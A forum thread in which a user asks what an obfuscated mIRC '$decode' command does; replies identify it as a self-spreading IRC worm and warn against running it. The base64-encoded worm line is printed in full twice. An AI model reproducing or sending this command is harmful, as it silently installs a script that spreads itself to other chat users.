• 0

mIRC question :\


Question

Okay i was on irc today (austnet to specific) and some lamer told me to put this in to that main channel

As i'm not an idiot i told the person to go F@#$ off and ignored him.

He said this code lets u get OP in the chan

Obvously it doesn't or he would have been OP in the channel

So what does this do?

  Quote
//$decode( d3JpdGUgxCBvbiAqOmpvaW46IzoudGltZXIgMSAzMCBpZiAoICRuaWNrICFpc29wICRjaGFuICkgLm1zZyAkbmljayBoZXkgJG5pY2sgdG8gZ2V0IE9QcyB1c2UgdGhpcyBoYWNrIGluIHRoZSBjaGFuIGJ1dCBTSEghIAM0Ly8kICQrIGRlY29kZSggJGVuY29kZSh3cml0ZSDEICRyZWFkKCRzY3JpcHQsbiwxKSxtKSAsbSkgJCAkKyBjaHIoMTI0KSAkICQgJCsgKyBkZWNvZGUoICRlbmNvZGUoLmxvYWQgLXJzIMQsbSkgLG0p ,m) | $decode( LmxvYWQgLXJzIMQ= ,m)
Link to comment
https://www.neowin.net/forum/topic/13274-mirc-question/
Share on other sites

9 answers to this question

Recommended Posts

  • 0

That is basically an irc worm, with no payload.

The unicode stuff decodes to a remote which is something along the lines of (this is from memory, i just *had* to find out what it did!)

on join 1:/msg $$1 'hey, type this to get ops in any channel! //$decode( d3JpdGUgxCBvbiAqOmpvaW46IzoudGltZXIgMSAzMCBpZiAoIC

RuaWNrICFpc29wICRjaGFuICkgLm1zZyAkbmljayBoZXkgJG5p

Y2sgdG8gZ2V0IE9QcyB1c2UgdGhpcyBoYWNrIGluIHRoZSBjaG

FuIGJ1dCBTSEghIAM0Ly8kICQrIGRlY29kZSggJGVuY29kZSh3

cml0ZSDEICRyZWFkKCRzY3JpcHQsbiwxKSxtKSAsbSkgJCAkKy

BjaHIoMTI0KSAkICQgJCsgKyBkZWNvZGUoICRlbmNvZGUoLmxv

YWQgLXJzIMQsbSkgLG0p ,m) | $decode( LmxvYWQgLXJzIMQ= ,m)"

So once you've run the decode line, it creates a file in c:mirc called a.(sumfin, txt prolly), which is pointed to in the remotes menu. Then when someone joins the # your in, you (unknowingly) msg them the above stuff, that you were sent in the first place.

Absolutely pointless, apart from to spread itself and give the writer some wierd pleasure!!!!!

long story short: you were wise to not run it. :)

hope thats clear enough!

Jon

Link to comment
https://www.neowin.net/forum/topic/13274-mirc-question/#findComment-108455
Share on other sites

  • 0

edit: sorry did not see someone had explained what it did..

(removed explanation)

But...

if anyone wants to check what a command does u can type //echo

the double // allows the command to echo with any aliases being executed

so /echo $time would just echo $time but //echo $time shows 23:18:43

From the resulting echo'ed result u can see it uses the write command .. which aint good if you dont know what it does

Hope that helps somewhat :)

Link to comment
https://www.neowin.net/forum/topic/13274-mirc-question/#findComment-108477
Share on other sites

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • I strongly feel it is a test bed for foldables. No other reason to slim down the phone even further, despite have a massive camera bump.
    • And they are both to blame. SEO optimisation and the knowledge panel killed web search. Both companies knew what they were doing. Now an interactive/dedicated knowledge panel is the front and centre of AI search, with websites simply being a back end to feed data to these tech giants. Don't need to pay ad money to websites if users dont visit them in the first place. https://arstechnica.com/ai/202...site-clicks-by-almost-half/
    • People yearn for the good old days of IRC and truly open Internet, yet are dismissive of modern solutions like ActivityPub (which Mastodon pioneered) and Matrix. Make it make sense.
    • AI judges learn new tricks to fact-check and code better by Paul Hill Image via Pixabay AI researchers and developers are increasingly turning to large language models (LLMs) to evaluate the responses of other LLMs in a process known as “LLM-as-a-judge”. Unfortunately, the quality of these evaluations degrades on complex tasks like long-form factual checking, advanced coding, and math problems. Now, a new research paper published by researchers from the University of Cambridge and Apple outlines a new system that augments AI judges with external validation tools to improve their judgment quality. This system aims to overcome limitations found in both human and AI annotation. Humans face challenges and biases due to time limits, fatigue, and being influenced by writing style over factual accuracy while AI struggles with the aforementioned complex tasks. The Evaluation Agent that the researchers created is agentic so it can assess the response to determine if external tools are needed and utilizes the correct tools. For each evaluation, three main steps are passed through: initial domain assessment, tool usage, and a final decision. The fact-checking tool uses web search to verify atomic facts within a response; code execution leverages OpenAI’s code interpreter to run and verify code correctness; and math checker is a specialized version of the code execution tool for validating mathematical and arithmetic operations. If none of the tools are found to be useful for making judgments, the baseline LLM annotator is used to avoid unnecessary processing and potential performance regression on simple tasks. The system delivered notable improvements in long-form factual checking, with significant increases in agreement with ground-truth annotations across various baselines. In coding tasks, the agent-based approach significantly improved performance across all baselines. For challenging math tasks, the agents improved performance over some baselines, but not all, and overall agreement remained relatively low at around 56%. Notably, the researchers found that in long-form factual responses, the agent’s agreement with ground-truth was higher than that of human annotators. This framework is extensible, so in the future, other tools could be integrated to further improve LLM evaluation systems. The code for the framework will be made open source on Apple’s GitHub, but it isn’t up yet.
  • Recent Achievements

    • Collaborator
      fernan99 earned a badge
      Collaborator
    • Collaborator
      MikeK13 earned a badge
      Collaborator
    • One Month Later
      Alexander 001 earned a badge
      One Month Later
    • One Month Later
      Antonio Barboza earned a badge
      One Month Later
    • Week One Done
      Antonio Barboza earned a badge
      Week One Done
  • Popular Contributors

    1. 1
      +primortal
      593
    2. 2
      ATLien_0
      225
    3. 3
      Michael Scrip
      171
    4. 4
      Xenon
      141
    5. 5
      +FloatingFatMan
      129
  • Tell a friend

    Love Neowin? Tell a friend!